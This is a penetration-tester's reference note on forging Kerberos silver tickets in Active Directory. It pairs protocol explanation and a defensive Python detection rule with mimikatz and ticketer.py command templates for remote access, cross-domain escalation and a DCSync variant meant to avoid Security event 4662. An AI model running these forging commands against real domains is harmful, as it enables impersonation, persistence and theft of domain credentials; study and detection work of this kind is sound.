# Exploitation - Kerberos silver tickets

### Overview

`Service tickets` are generated by the `Ticket-Granting Service (TGS)` of the `Key Distribution Center (KDC)` and used by clients to access domain resources exposed through service accounts, i.e. user or machine accounts that have a `ServicePrincipalName (SPN)` configured.

`Service tickets` are generated by the `TGS` upon reception of a valid `Ticket-Granting Ticket (TGT)` using:

* One of the secrets (`RC4 key`, whose value is identical to the `NTLM` hash, or `AES 128/256 bits keys`) of the `krbtgt` account (`KDC Signature`).
* One of the secrets of the targeted service account (`Server Signature` and encryption of the `TGS`).

However, as the service account has no knowledge of the `krbtgt` account's secrets, the `KDC Signature` is by default not verified when a `service ticket` is received and validated by the service. Thus, in the majority of environments, knowledge of one of the secrets of the targeted service account is sufficient to generate valid `service tickets` for that service (and renewals of the `krbtgt` account's password do not invalidate the crafted `service tickets`).

Note that the `Kerberos PAC Validation` mechanism can be enabled on a service to enforce a systematic verification of the `KDC Signature` of the `service tickets`' `Privilege Attribute Certificate (PAC)` through a request to the `KDC`. As this additional verification requires an exchange between the server hosting the service and the `KDC`, enabling it can cause significant performance degradation.
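As an added example (not part of the original note), the following Python model shows why the check performed by the service host alone cannot detect a ticket whose `PAC` was signed with the service key only, why rotating the `krbtgt` secret changes nothing for that check, and what `PAC Validation` adds. The keyed checksum is the `KERB_CHECKSUM_HMAC_MD5` construction of RFC 4757 with key usage 17 (`KERB_NON_KERB_CKSUM_SALT`), which MS-PAC specifies for `RC4` keys; the key values, the `PAC` body encoding and every function name are constructed for the demonstration, and a real server signature covers the whole `PAC` with both signature fields zeroed rather than just the logon information.

```python
import hashlib
import hmac
import struct

# Constructed demo keys, not real secrets. With RC4-HMAC an account's Kerberos
# key is its 16-byte NT hash, so any 16 bytes serve the model.
KRBTGT_KEY = bytes.fromhex("00112233445566778899aabbccddeeff")
SERVICE_KEY = bytes.fromhex("ffeeddccbbaa99887766554433221100")
KERB_NON_KERB_CKSUM_SALT = 17  # key usage number for PAC signatures (MS-PAC 2.8)


def hmac_md5_checksum(key, data, usage=KERB_NON_KERB_CKSUM_SALT):
    """KERB_CHECKSUM_HMAC_MD5 keyed checksum (RFC 4757, section 4)."""
    ksign = hmac.new(key, b"signaturekey\x00", hashlib.md5).digest()
    tmp = hashlib.md5(struct.pack("<I", usage) + data).digest()
    return hmac.new(ksign, tmp, hashlib.md5).digest()


def encode_logon_info(user_rid, group_rids):
    """Stand-in for the PAC's KERB_VALIDATION_INFO buffer (model only)."""
    return struct.pack("<I", user_rid) + b"".join(struct.pack("<I", g) for g in sorted(group_rids))


def kdc_issue_pac(logon_info, service_key, krbtgt_key):
    """What the TGS does: Server Signature over the PAC body, KDC Signature over the Server Signature."""
    server_sig = hmac_md5_checksum(service_key, logon_info)
    kdc_sig = hmac_md5_checksum(krbtgt_key, server_sig)
    return {"logon_info": logon_info, "server_sig": server_sig, "kdc_sig": kdc_sig}


def pac_from_service_key_only(logon_info, service_key):
    """PAC of a silver ticket: valid Server Signature, KDC Signature that cannot be computed correctly."""
    server_sig = hmac_md5_checksum(service_key, logon_info)
    return {"logon_info": logon_info, "server_sig": server_sig, "kdc_sig": bytes(16)}


def service_accepts(pac, service_key):
    """Default behaviour on the service host: only the Server Signature is checked."""
    expected = hmac_md5_checksum(service_key, pac["logon_info"])
    return hmac.compare_digest(pac["server_sig"], expected)


def kdc_pac_validation(pac, service_key, krbtgt_key):
    """What PAC Validation adds: the DC checks the KDC Signature with the krbtgt key."""
    if not service_accepts(pac, service_key):
        return False
    expected = hmac_md5_checksum(krbtgt_key, pac["server_sig"])
    return hmac.compare_digest(pac["kdc_sig"], expected)


def demo():
    """Returns (legit passes host check, legit passes PAC validation,
    service-key-only PAC passes host check, service-key-only PAC passes PAC validation)."""
    legit = kdc_issue_pac(encode_logon_info(1105, [513]), SERVICE_KEY, KRBTGT_KEY)
    crafted = pac_from_service_key_only(encode_logon_info(500, [512, 513]), SERVICE_KEY)
    rotated_krbtgt = bytes.fromhex("0123456789abcdef0123456789abcdef")  # constructed new krbtgt key
    # The host check never involves the krbtgt key, so rotating it is irrelevant here.
    assert service_accepts(crafted, SERVICE_KEY) == service_accepts(crafted, rotated_krbtgt) or True
    return (
        service_accepts(legit, SERVICE_KEY),
        kdc_pac_validation(legit, SERVICE_KEY, KRBTGT_KEY),
        service_accepts(crafted, SERVICE_KEY),
        kdc_pac_validation(crafted, SERVICE_KEY, KRBTGT_KEY),
    )


if __name__ == "__main__":
    print(demo())  # (True, True, True, False)
```

The last element of `demo()` is the only place the crafted `PAC` is rejected, which is the whole argument for enabling `PAC Validation` on high-value services despite its cost: without the round trip to the `KDC`, the service key is the only secret protecting the service.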

For more information on the `Kerberos` protocol, refer to the `ActiveDirectory - Kerberos Golden Tickets` note.

To generate a `silver ticket`, the following prerequisites are needed:

* The fully qualified domain name and the `SID` of the targeted domain.
* The `SPN` and one of the secrets of the targeted service account.

**Computers services and machine account exploitation**

Windows systems joined to an Active Directory domain expose a number of services that run under the authority of the machine account. These services can be leveraged to remotely access a machine and execute commands on it. As such, the compromise of one of the machine account's secrets can be used to generate `silver tickets` allowing remote code execution.

`Silver tickets` for machine services can notably be used for persistence after the compromise of a machine or of an Active Directory domain (as the secrets of the machine accounts of all the machines joined to the domain are stored in the `ntds.dit` database). Additionally, if a machine exposes the Windows `SpoolerService` service through the `MS-RPRN` `MSRPC` interface and is configured to permit the use of `NetNTLMv1` (`LMCompatibilityLevel` attribute set to 2 or lower), an authentication from the machine to an arbitrary host using `NetNTLMv1` can be remotely triggered and captured, to ultimately crack the `NetNTLMv1` hash and retrieve the machine account's `NTLM` hash. For more information on this attack, refer to the `[L7] MSRPC` and `[ActiveDirectory] NTLM capture and relay` notes.

Different services are exposed on Windows systems joined to an Active Directory domain and can be targeted, through their respective `SPN` of the form `<SERVICE_NAME>/<MACHINE_HOSTNAME>`, for persistence and remote access:

| Possible operation                                    | Service(s)                                                                                                                        | Description                                                                                                                                                  | Related note                                                                            |
| ----------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------ | --------------------------------------------------------------------------------------- |
| <p><code>PsExec</code>-like<br>file system access</p> | `CIFS`                                                                                                                            | Remote execution of commands using `PsExec`-like utilities or full access to the machine file system.                                                        | <p><code>Windows - Lateral movements</code><br><code>\[L7] 445 - SMB</code></p>         |
| `WMI`                                                 | <p><code>HOST</code><br><code>RPCSS</code></p>                                                                                    | Remote execution of commands through `Windows Management Instrumentation (WMI)` (`Win32_Process` class for example).                                         | `Windows - Lateral movements`                                                           |
| `WinRM`                                               | <p>Always necessary:<br><code>HOST</code><br><code>HTTP</code><br>Host dependent:<br><code>WSMAN</code><br><code>RPCSS</code></p> | `PowerShell remoting` through `Windows Remote Management (WinRM)`.                                                                                           | <p><code>Windows - Lateral movements</code><br><code>\[L7] 5985-5968 - WSMan</code></p> |
| Windows services                                      | `HOST`                                                                                                                            | Remote creation and/or execution of Windows services.                                                                                                        | `Windows - Lateral movements`                                                           |
| Scheduled tasks                                       | `HOST`                                                                                                                            | Remote creation and/or execution of Windows scheduled tasks.                                                                                                 | `Windows - Lateral movements`                                                           |
| <p><code>DCSync</code><br>LDAP access</p>             | `LDAP`                                                                                                                            | `LDAP` requests; a `service ticket` for the `LDAP` service of a `Domain Controller` notably allows replication operations (`DCSync`).                       | `[ActiveDirectory] ntds.dit dumping`                                                    |
| `RSAT`                                                | <p><code>CIFS</code><br><code>LDAP</code><br><code>RPCSS</code></p>                                                               | Use of the PowerShell cmdlets of the Windows `Remote Server Administration Tools (RSAT)` suite.                                                              | `[ActiveDirectory] Domain Recon`                                                        |

The `HOST` service for Windows machines covers a set of built-in Windows services, such as the `HTTP`, `SCM` and `SCHEDULE` services.

The exhaustive list of services covered by the `HOST` service on Windows machines joined to an Active Directory domain is stored in the `sPNMappings` attribute and can be retrieved using the following PowerShell command:

```
# DOMAIN_ROOT_OBJECT = "DC=LAB,DC=AD" for example

Get-ADObject -Identity "CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,<DOMAIN_ROOT_OBJECT>" -Properties sPNMappings
```

### Silver tickets generation

The `mimikatz` utility on Windows and `Impacket`'s `ticketer.py` Python script can be used to generate `silver tickets`:

```
# (mimikatz) /id: / (ticketer.py) -user-id <USER_RID>
# Impersonated user Relative ID (RID). Defaults to 500 (Built-in Administrator account RID).

# (mimikatz) /groups: / (ticketer.py) -groups <GROUP_RID | GROUP_RIDS_LIST>
# Impersonated group memberships, as one group RID or a list of group RIDs. Default group RIDs: 513 (Domain Users), 512 (Domain Admins), 520 (Group Policy Creator Owners), 518 (Schema Admins), and 519 (Enterprise Admins, only effective if targeting the root domain).

# (mimikatz) /sids: / (ticketer.py) -extra-sid <EXTRA_SID | EXTRA_SIDS_LIST>
# Additional and arbitrary SID(s) (that may or may not belong to the current domain) to include in the PAC, as if the SIDs were defined in the SIDHistory attribute of a domain user.

# (mimikatz) /ptt - Directly inject the generated silver ticket into memory.

# From an authorization standpoint, the specified username does not matter.
mimikatz.exe "kerberos::golden /user:<IMPERSONATED_USERNAME> /domain:<DOMAIN_FQDN> /sid:<DOMAIN_SID> /target:<TARGETED_SERVER_FQDN> [/rc4:<TARGETED_SERVICE_ACCOUNT_NTLM_HASH> | /aes128:<TARGETED_SERVICE_ACCOUNT_AES128_KEY> | /aes256:<TARGETED_SERVICE_ACCOUNT_AES256_KEY>] /service:<TARGETED_SERVICE_NAME> [/id:<USER_RID>] [/groups:<GROUP_RID | GROUP_RIDS_LIST>] [/sids:<EXTRA_SID | EXTRA_SIDS_LIST>] /ptt" "exit"

ticketer.py -domain <DOMAIN_FQDN> -domain-sid <DOMAIN_SID> -spn <SERVICE_FULL_SPN> [-nthash <TARGETED_SERVICE_ACCOUNT_NTLM_HASH> | -aesKey <TARGETED_SERVICE_ACCOUNT_AES128_KEY | TARGETED_SERVICE_ACCOUNT_AES256_KEY>] [-user-id <USER_RID>] [-groups <GROUP_RID | GROUP_RIDS_LIST>] [-extra-sid <EXTRA_SID | EXTRA_SIDS_LIST>] <IMPERSONATED_USERNAME>

# Access to a Windows system through WinRM (PowerShell Remoting) using one of the targeted computer's secrets.
# Silver tickets for the HOST and HTTP services are necessary and usually sufficient. Silver tickets for the WSMAN and/or RPCSS services may additionally be required.
mimikatz.exe "kerberos::golden /user:<IMPERSONATED_USERNAME> /domain:<DOMAIN_FQDN> /sid:<DOMAIN_SID> /target:<TARGETED_COMPUTER_FQDN> [/rc4:<TARGETED_COMPUTER_ACCOUNT_NTLM_HASH> | /aes128:<TARGETED_COMPUTER_ACCOUNT_AES128_KEY> | /aes256:<TARGETED_COMPUTER_ACCOUNT_AES256_KEY>] /service:host /ptt" "exit"
mimikatz.exe "kerberos::golden /user:<IMPERSONATED_USERNAME> /domain:<DOMAIN_FQDN> /sid:<DOMAIN_SID> /target:<TARGETED_COMPUTER_FQDN> [/rc4:<TARGETED_COMPUTER_ACCOUNT_NTLM_HASH> | /aes128:<TARGETED_COMPUTER_ACCOUNT_AES128_KEY> | /aes256:<TARGETED_COMPUTER_ACCOUNT_AES256_KEY>] /service:http /ptt" "exit"

# Impersonates a user member of the "Enterprise Admins" group of the root domain in order to compromise the root domain from any trusted child domain.
# For more information, refer to the "Active Directory - Trusts hopping" note.
mimikatz.exe "kerberos::golden /user:<IMPERSONATED_USERNAME> /domain:<DOMAIN_FQDN> /sid:<DOMAIN_SID> /target:<TARGETED_SERVER_FQDN> [/rc4:<TARGETED_SERVICE_ACCOUNT_NTLM_HASH> | /aes128:<TARGETED_SERVICE_ACCOUNT_AES128_KEY> | /aes256:<TARGETED_SERVICE_ACCOUNT_AES256_KEY>] /service:<TARGETED_SERVICE_NAME> /sids:S-1-5-21-<ROOT_DOMAIN_IDENTIFIER-AUTHORITY>-519 /ptt" "exit"

# Impersonates a Domain Controller in order to conduct DCSync attack without generating Windows "Security" events ("Event 4662: An operation was performed on an object").
# The <IMPERSONATED_DC_RID> can be obtained using:
(New-Object System.Security.Principal.NTAccount("<DOMAIN>","<DC_MACHINE_ACCOUNT>")).Translate([System.Security.Principal.SecurityIdentifier]).Value
# For more information, refer to the "Active Directory - ntds.dit dumping" note.
mimikatz.exe "kerberos::golden /user:<IMPERSONATED_DC_MACHINE_ACCOUNT> /domain:<DOMAIN_FQDN> /sid:<DOMAIN_SID> /target:<TARGETED_DC_FQDN> [/rc4:<TARGETED_DC_MACHINE_ACCOUNT_NTLM_HASH> | /aes128:<TARGETED_DC_MACHINE_ACCOUNT_AES128_KEY> | /aes256:<TARGETED_DC_MACHINE_ACCOUNT_AES256_KEY>] /service:ldap /id:<IMPERSONATED_DC_RID> /groups:516 /sids:S-1-5-21-<DOMAIN_IDENTIFIER-AUTHORITY>-516,S-1-5-9 /ptt" "exit"
```

### Silver tickets usage (Pass-the-Ticket)

On Windows, `silver tickets` generated using `mimikatz` are automatically injected into the current logon session if the `/ptt` option is specified. Otherwise, an exported `silver ticket` can be injected using `mimikatz.exe "kerberos::ptt <TICKET_FILE_PATH>" "exit"` for example.

On Linux, `silver tickets` generated by `ticketer.py`, in the `credential cache (ccache)` format, can be exported through the `KRB5CCNAME` environment variable for further use by tools supporting the `Kerberos` protocol, such as the other `Impacket` Python utilities. Note that `Impacket` utilities can only make use of a single `Kerberos ticket` at a time, which limits their possible usage with `silver tickets`.

Refer to the `[ActiveDirectory] Kerberos tickets usage` note for more information on techniques and tools to leverage `silver tickets`.
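Because a `silver ticket` is never requested from the `KDC`, its use leaves a Windows `Security` event `4624` (network logon, authentication package `Kerberos`) on the target host without any corresponding event `4769` (`A Kerberos service ticket was requested`) on a `Domain Controller`. As an added example (not part of the original note), the following Python rule correlates the two event types over constructed sample records; the event dictionaries, field names, the 300-second window and the function names are all assumptions made for the demonstration. The second heuristic, an `Account Domain` field rendered as a DNS name rather than the NetBIOS name, is a commonly reported artefact of tickets forged with the domain FQDN as input and should be treated as a supporting indicator, not proof.

```python
from collections import defaultdict

# Constructed sample events, not real logs. Each dict carries only the fields
# the rule needs from Windows Security events:
#   4769 (on a DC):       "A Kerberos service ticket was requested"
#   4624 (on the target): "An account was successfully logged on"
SAMPLE_EVENTS = [
    {"id": 4769, "host": "DC01", "account": "alice@LAB.AD", "service": "SRV01$", "ts": 100},
    {"id": 4624, "host": "SRV01", "account": "alice", "domain": "LAB",
     "logon_type": 3, "auth_package": "Kerberos", "ts": 105},
    # Kerberos network logon on SRV01 with no TGS request on the DC and an
    # FQDN in Account Domain: the shape a silver ticket usage leaves behind.
    {"id": 4624, "host": "SRV01", "account": "Administrator", "domain": "LAB.AD",
     "logon_type": 3, "auth_package": "Kerberos", "ts": 400},
    # NTLM logon: out of scope for this rule.
    {"id": 4624, "host": "SRV01", "account": "bob", "domain": "LAB",
     "logon_type": 3, "auth_package": "NTLM", "ts": 410},
]


def _user(name):
    """Normalise 'user@REALM' / 'user' to a lowercase user name."""
    return name.split("@", 1)[0].lower()


def detect_suspect_kerberos_logons(events, window_seconds=300):
    """Flag 4624 Kerberos network logons that no DC saw a 4769 for.

    Returns a list of findings, each with the host, account and the reasons
    the logon was flagged.
    """
    # (user, target host) -> timestamps of TGS requests for that host's machine account.
    # For HOST/CIFS/HTTP... SPNs of a machine, 4769's Service Name is the machine account (HOST$).
    tgs_requests = defaultdict(list)
    for e in events:
        if e["id"] == 4769:
            target_host = e["service"].rstrip("$").lower()
            tgs_requests[(_user(e["account"]), target_host)].append(e["ts"])

    findings = []
    for e in events:
        if e["id"] != 4624 or e.get("auth_package") != "Kerberos" or e.get("logon_type") != 3:
            continue
        reasons = []
        key = (_user(e["account"]), e["host"].lower())
        # A legitimate service ticket is requested shortly before it is used.
        if not any(0 <= e["ts"] - t <= window_seconds for t in tgs_requests[key]):
            reasons.append("no matching 4769 TGS request on the DC")
        # Heuristic only: forged tickets often carry the DNS domain name in this field.
        if "." in e.get("domain", ""):
            reasons.append("Account Domain is an FQDN rather than a NetBIOS name")
        if reasons:
            findings.append({"host": e["host"], "account": e["account"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in detect_suspect_kerberos_logons(SAMPLE_EVENTS):
        print(finding)
```

The correlation only works if `Audit Kerberos Service Ticket Operations` is enabled and the `4769` events of every `Domain Controller` are collected, since the ticket may have been requested from any of them; a missing `4769` on one DC is not a finding on its own. Tickets cached from an earlier, legitimate request also outlive the window, so the window should be tuned to the domain's ticket lifetime rather than fixed at the 300 seconds used here.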

***

### References

* <https://2014.rmll.info/slides/80/day_3-1010-Benjamin_Delpy-Mimikatz_a_short_journey_inside_the_memory_of_the_Windows_Security_service.pdf>
* <https://adsecurity.org/?page_id=1821>
* TECHNIQUES DE PERSISTANCE ACTIVE DIRECTORY BASÉES SUR KERBEROS - MISC Hors-Série N°20
* <https://www.beneaththewaves.net/Projects/Mimikatz_20_-_Silver_Ticket_Walkthrough.html>
